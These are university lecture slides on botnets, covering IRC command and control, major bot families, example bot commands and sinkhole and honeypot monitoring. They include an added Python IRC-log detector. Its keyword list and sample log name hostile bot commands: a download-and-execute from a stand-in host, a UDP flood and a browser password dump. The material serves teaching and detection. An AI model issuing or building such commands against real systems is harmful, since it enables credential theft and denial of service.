
CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2014

  1. CAP6135: Malware and Software Vulnerability Analysis. Botnets. Cliff Zou, Spring 2014

  2. Acknowledgement
     • This lecture uses some contents from the lecture notes from:
       • Dr. Dawn Song: CS161: Computer Security
       • Richard Wang – SophosLabs: The Development of Botnets
       • Randy Marchany – VA Tech IT Security Lab: Botnets

  3. Botnets
     • Collection of compromised hosts
     • Spread like worms and viruses
     • Once installed, respond to remote commands
     • A network of ‘bots’
       • robot: an automatic machine that can be programmed to perform specific tasks
     • Also known as ‘zombies’

  4. Platform for many attacks
     • Spam forwarding (70% of all spam?)
     • Click fraud
     • Keystroke logging
     • Distributed denial of service attacks
     • Serious problem
       • Top concern of banks, online merchants
       • Vint Cerf: ¼ of hosts connected to the Internet

  5. What are botnets used for?

  6. IRC (Internet Relay Chat) based Control

  7. IRC (Internet Relay Chat) based Control

  8. Why IRC?
     • IRC servers are:
       • freely available
       • easy to manage
       • easy to subvert
     • Attackers have experience with IRC
     • IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts

  9. How bad is the problem?
     • Symantec identified a 400K-node botnet
     • A network admin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections
       • Phatbot harvests MyDoom- and Bagle-infected machines
     • Researchers at Georgia Tech monitored thousands of botnets

  10. Spreading Problem
     • Spreading mechanism is a leading cause of background noise
     • Ports 445, 135, 139, 137 accounted for 80% of traffic captured by the German Honeynet Project
     • Other ports:
       • 2745 – Bagle backdoor
       • 3127 – MyDoom backdoor
       • 3410 – Optix trojan backdoor
       • 5000 – UPnP vulnerability

  11. Most commonly used bot families
     • Agobot
     • SDBot
     • SpyBot
     • GT Bot

  12. Agobot
     • Most sophisticated
     • 20,000 lines of C/C++ code
     • IRC-based command/control
     • Large collection of target exploits
     • Capable of many DoS attack types
     • Shell encoding/polymorphic obfuscation
     • Traffic sniffers/key logging
     • Defend/fortify compromised system
     • Ability to frustrate disassembly

  13. SDBot
     • Simpler than Agobot, 2,000 lines of C code
     • Non-malicious at base
     • Utilizes IRC-based command/control
     • Easily extended for malicious purposes:
       • Scanning
       • DoS attacks
       • Sniffers
       • Information harvesting
       • Encryption

  14. SpyBot
     • <3,000 lines of C code
     • Possibly evolved from SDBot
     • Similar command/control engine
     • No attempts to hide malicious purposes

  15. GT Bot
     • Functions based on mIRC scripting capabilities
     • HideWindow program hides the bot on the local system
     • Basic rootkit function
     • Port scanning, DoS attacks, exploits for RPC and NetBIOS

  16. Variance in codebase size, structure, complexity, implementation
     • Convergence in set of functions
     • Possibility for defense systems effective across bot families
     • Bot families extensible
     • Agobot likely to become dominant

  17. Control
     • All of the above use IRC for command/control
     • Disrupt IRC, disable bots
       • Sniff IRC traffic for commands
       • Shut down channels used for botnets
     • IRC operators play a central role in stopping botnet traffic
       • But a botnet could use its own IRC server
       • Automated traffic identification required
     • Future botnets may move away from IRC
       • Move to P2P communication
       • Traffic fingerprinting still useful for identification

  18. Host control
     • Fortify system against other malicious attacks
       • Disable anti-virus software
     • Harvest sensitive information
       • PayPal, software keys, etc.
     • Economic incentives for botnets
     • Stresses need to patch/protect systems prior to attack
     • Stronger protection boundaries required across applications in OSes

  19. Example Botnet Commands
     • Connection
       • CLIENT: PASS <password>
       • HOST: (if error, disconnect)
       • CLIENT: NICK <nick>
       • HOST: NICKERROR | CONNECTED
     • Pass hierarchy info
       • BOTINFO <nick> <connected_to> <priority>
       • BOTQUIT <nick>

  20. Example Botnet Commands
     • IRC commands
       • CHANJOIN <tag> <channel>
       • CHANPART <tag> <channel>
       • CHANOP <tag> <channel>
       • CHANKICK <tag> <channel>
       • CHANBANNED <tag> <channel>
       • CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>

  21. Example Botnet Commands
     • pstore
       • Display all usernames/passwords stored in browsers of infected systems
     • bot.execute
       • Run executable on remote system
     • bot.open
       • Reads file on remote computer
     • bot.command
       • Runs command with system()

  22. Example Botnet Commands
     • http.execute
       • Download and execute file through http
     • ftp.execute
     • ddos.udpflood
     • ddos.synflod
     • ddos.phaticmp
     • redirect.http
     • redirect.socks
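Slide 17 notes that IRC traffic can be sniffed for commands and that traffic fingerprinting stays useful for identification; slides 19-22 give the command vocabulary such a fingerprint would key on. The following is an added detection example, not code from the lecture: it parses constructed IRC PRIVMSG log lines, matches the first word of each message against the slides' command tokens (the prefix and word lists are an assumption drawn from those slides), and reports channels that carry repeated bot-style commands.

```python
import re
from collections import defaultdict

# Command vocabulary taken from the slides (Agobot/SDBot-style C&C commands plus
# the hierarchy and channel commands). Signature tokens only, not a full grammar.
BOT_COMMAND_PREFIXES = ("bot.", "ddos.", "http.", "ftp.", "redirect.")
BOT_COMMAND_WORDS = {"pstore", "BOTINFO", "BOTQUIT", "CHANJOIN", "CHANPART",
                     "CHANOP", "CHANKICK", "CHANBANNED", "CHANPRIORITY"}

# Minimal IRC PRIVMSG line: ":nick!user@host PRIVMSG #channel :message text"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)\S*\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

def looks_like_bot_command(text):
    """True if the first word of a message is a known bot command token."""
    words = text.split()
    if not words:
        return False
    return words[0] in BOT_COMMAND_WORDS or words[0].startswith(BOT_COMMAND_PREFIXES)

def analyze_irc_log(lines, min_hits=2):
    """Return {channel: [command tokens]} for channels carrying at least
    min_hits bot-style commands; min_hits filters one-off chat mentions."""
    hits = defaultdict(list)
    for line in lines:
        m = PRIVMSG_RE.match(line.strip())
        if m and looks_like_bot_command(m.group("text")):
            hits[m.group("target")].append(m.group("text").split()[0])
    return {chan: cmds for chan, cmds in hits.items() if len(cmds) >= min_hits}

# Constructed sample traffic (not a real capture): a benign chat channel and a
# channel where one nick issues commands taken from the slides.
SAMPLE_LOG = [
    ":alice!a@host1 PRIVMSG #linux :anyone tried the new kernel?",
    ":bob!b@host2 PRIVMSG #linux :yes, works fine here",
    ":m4st3r!x@host9 PRIVMSG #z0mb13s :http.execute http://example.invalid/upd.exe",
    ":m4st3r!x@host9 PRIVMSG #z0mb13s :ddos.udpflood 192.0.2.10 3600",
    ":m4st3r!x@host9 PRIVMSG #z0mb13s :pstore",
    ":carol!c@host3 PRIVMSG #linux :bot.execute is not a real shell command, right?",
    "PING :irc.example.invalid",
]

if __name__ == "__main__":
    for chan, cmds in analyze_irc_log(SAMPLE_LOG).items():
        print(f"{chan}: {len(cmds)} bot-style commands -> {cmds}")
```

The carol line shows why a threshold matters: a single chat mention of `bot.execute` in #linux is not enough to flag the channel, while #z0mb13s is reported on its three commands.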

  23. Current Botnet Control Architecture (figure: botmaster → C&C servers → bots)
     • More than one C&C server
     • Spread all around the world

  24. Botnet Monitor: Gatech KarstNet (figure: attacker, C&C servers reached via cc1.com, bots, KarstNet sinkhole)
     • Many bots use a dynamic-DNS name to find the C&C
     • KarstNet informs the DNS provider of cc1.com
       • Detect cc1.com by its abnormal DNS queries
     • DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
     • All/most bots attempt to connect to the sinkhole

  25. Botnet Monitor: Honeypot Spy
     • Security researchers set up honeypots
       • Honeypots: deliberately vulnerable machines set up to be compromised
       • When compromised, closely monitor the malware's behavior
       • Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
     • When a compromised honeypot joins a botnet:
       • Passive monitoring: log all network traffic
       • Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional C&C, etc.)
     • Representative research paper:
       • Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. A multifaceted approach to understanding the botnet phenomenon. 6th ACM SIGCOMM Conference on Internet Measurement (IMC), 2006.

  26. The Future Generation of Botnets
     • Peer-to-peer C&C
     • Polymorphism
     • Anti-honeypot
     • Rootkit techniques
